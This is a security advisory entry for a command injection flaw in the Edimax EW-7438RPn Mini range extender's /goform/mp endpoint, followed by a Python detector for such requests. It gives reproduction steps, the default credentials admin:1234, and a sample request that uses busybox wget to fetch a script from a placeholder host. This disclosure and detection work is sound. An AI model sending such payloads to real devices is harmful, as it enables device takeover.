Edimax EW-7438RPn Mini
cpe:2.3:h:edimax:ew-7438rpn_mini:*:*:*:*:*:*:*
- 1.23
- 1.27
A remote code execution vulnerability exists in the Edimax EW-7438RPn-v3 Mini Wi-Fi range extender, specifically in firmware version 1.27. This vulnerability allows unauthenticated attackers to execute arbitrary commands by sending crafted POST requests with command injection payloads to the /goform/mp endpoint. Exploitation of this vulnerability could lead to the download and execution of malicious scripts on the device.
Exploitation of this vulnerability allows for remote code execution on the affected device.
The vulnerability can be reproduced by sending a POST request to the /goform/mp endpoint. In 'Setup Mode', the request can be sent without authentication. In 'Unsetup Mode', the default credentials (admin:1234) must be used. The 'command' parameter can be populated with a payload that, for example, uses 'busybox wget' to download a script from a remote server and execute it.
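A detection-side check for the request pattern described above, as an added example that is not part of the original advisory or any vendor code: it inspects raw HTTP requests for POSTs to /goform/mp and reports whether each one was unauthenticated or used the default credentials. The function name, the metacharacter and download-tool heuristics, the use of HTTP Basic authentication, and the sample requests are assumptions made for the illustration.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Heuristics and auth scheme are assumptions for this example, not vendor signatures.
SHELL_META = re.compile(r"[;|&`$<>\n]")
FETCH_TOOLS = re.compile(r"\b(wget|curl|tftp)\b", re.I)
DEFAULT_CREDS = "admin:1234"  # default credentials named in the advisory


def inspect_request(raw):
    """Return findings for a raw POST to /goform/mp, or None for other requests."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    parts = lines[0].split()
    if len(parts) < 2 or parts[0].upper() != "POST":
        return None
    if urlsplit(parts[1]).path.rstrip("/") != "/goform/mp":
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    # Classify authentication: Setup Mode needs none, Unsetup Mode the default login.
    auth = "none"
    scheme, _, token = headers.get("authorization", "").partition(" ")
    if scheme.lower() == "basic":
        try:
            creds = base64.b64decode(token.strip(), validate=True).decode("utf-8", "replace")
        except ValueError:
            creds = ""
        auth = "default" if creds == DEFAULT_CREDS else "other"
    reasons = set()
    for value in parse_qs(body, keep_blank_values=True).get("command", []):
        if SHELL_META.search(value):
            reasons.add("shell metacharacter in command")
        if FETCH_TOOLS.search(value):
            reasons.add("download tool in command")
    return {"auth": auth, "suspicious": bool(reasons), "reasons": sorted(reasons)}


# Constructed sample requests, not captured traffic; addresses are placeholders.
SAMPLE_UNAUTH = (
    "POST /goform/mp HTTP/1.1\r\nHost: 192.168.0.1\r\n\r\n"
    "command=busybox+wget+http%3A%2F%2F192.0.2.10%2Fs.sh"
)
SAMPLE_DEFAULT = (
    "POST /goform/mp HTTP/1.1\r\nAuthorization: Basic "
    + base64.b64encode(DEFAULT_CREDS.encode()).decode() + "\r\n\r\ncommand=status"
)
```

Because the endpoint accepts unauthenticated requests in 'Setup Mode', an `auth` value of `none` or `default` on any POST to this path is worth alerting on even when the `command` heuristics do not fire.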